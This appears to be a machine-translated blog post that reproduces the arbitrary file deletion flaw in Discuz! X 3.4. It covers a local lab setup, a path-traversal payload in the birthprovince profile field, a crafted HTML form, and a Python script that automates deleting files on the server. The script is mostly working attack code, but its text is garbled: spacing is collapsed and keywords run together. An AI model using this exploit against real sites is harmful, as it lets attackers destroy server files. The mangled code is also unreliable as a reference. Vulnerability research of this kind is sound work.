discuz! X 3.4 Any file deletion vulnerability recurrence process (Python script included)

Today, we're talking about discuz! in the group. X 3.4 Any file deletion vulnerability, self-made some tests, record the process. At the end, attach your own Python script and automate any file deletion.

Specific vulnerability, please view https://paper.seebug.org/411/

0X01 Environment Construction

To the official website download Discuz 3.4 version, phpstudy this machine builds, and registers the account. The site root creates a new 111.txt as the deleted destination file.

Discuz 3.4 Download Link: http://www.discuz.net/thread-3825961-1-1.html

0X02 Environment Construction

1, after the account login, click Settings, jump to the profile page, view the page source code, get Formhash value

2. Submit a request to amend the place of birth

Http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base

[post] birthprovince=. /.. /.. /111.txt&profilesubmit=1&formhash=9945c60c

3. Construct the form, delete the file after the request

<form action="Http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthproviNce]=aaaaaa"method="POST"enctype="Multipart/form-data"><input type="file"Name="birthprovince"Id="file"/><input type="text"Name="Formhash"Value="9945c60c"/></p><input type="text"Name="Profilesubmit"Value="1"/></p><input type="Submit"Value="Submit"/></ from>

0X03 python Script

According to the previous steps, wrote a Python script, instead of manual operation, the native test success ... Long time no script, code a little low, enough can ...

#!/usr/bin/Env python#-*-coding:utf-8-*-import requestsimport reimport urllib2" "discuz! X≤3.4arbitrary file Removal Vulnerability write by Aaron" "def get_cookie (): Cookies={}     forLineinchRaw_cookies.split (';'): Key,value=line.split ('=',1) Cookies[key]=valuereturncookiesdef get_formhash (URL): Cookies=Get_cookie () Testurl=url+"/HOME.PHP?MOD=SPACECP"s=requests.Get(testurl,cookies=cookies) COM= Re.compile ('<input type= "hidden" name= "Formhash" value= "(. *?)"/>') Result=Com.findall (S.text)returnresult[0]def Del_step1 (url,filename): Headers={'user-agent':'mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) gecko/20100101 firefox/55.0'} Geturl=url+"/home.php?mod=spacecp&ac=profile&op=base"Formhash=get_formhash (URL) payload={'birthprovince': filename,"Profilesubmit":1,"Formhash": Formhash} cookies=Get_cookie () R= Requests.post (geturl,data=payload,headers=headers,cookies=cookies)ifR.content.find ('parent.show_success') >0: Print'STEP1 Success!!!'def del_step2 (URL): Geturl=url+"/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"Heads={'user-agent':'mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) gecko/20100101 firefox/55.0'} Formhash=get_formhash (URL) files={'Formhash':(None,formhash),'birthprovince':('1.jpg', Open ('1.jpg','RB'),'Image/jpeg'),'Profilesubmit':(None,'1')} Cookies=Get_cookie () R=requests.post (geturl,files=files,headers=heads,cookies=cookies)ifR.text.find ('parent.show_success') >0: Print'STEP2 Success!!!'        if__name__ = ='__main__': #需要修改以下三个参数: #1, set cookie raw_cookies="G2pl_2132_sid=skkqzk; G2pl_2132_saltkey=sz3zk9qk; g2pl_2132_lastvisit=1506772875; G2PL_2132_LASTACT=1506779386%09HOME.PHP%09SPACECP; G2PL_2132_SECCODE=7.AA0407E77FA5C31C1B; G2pl_2132__refer=%252fhome.php%253fmod%253dspacecp%2526ac%253dprofile%2526op%253dbase; g2pl_2132_ulastactivity=d085jjijs5hig3obxlejquw0znypin60oxjv0j6di%2b8afmkq4u6l; G2PL_2132_AUTH=86C5F09HGUAZUGNPSX7PR7OY4MQ2B39NSVIV%2FRFC8VDN1ZJB9PIBVU2FN4JJR9HR7YVNF2VH9RIXRSLWHMZK; g2pl_2132_nofavfid=1; g2pl_2132_sendmail=1; G2pl_2132_noticetitle=1"    #2, set the deleted file filename=".. /.. /.. /111.txt"      #3, set URL URL="http://127.0.0.1"del_step1 (url,filename) del_step2 (URL)

discuz! X 3.4 Any file deletion vulnerability recurrence process (Python script included)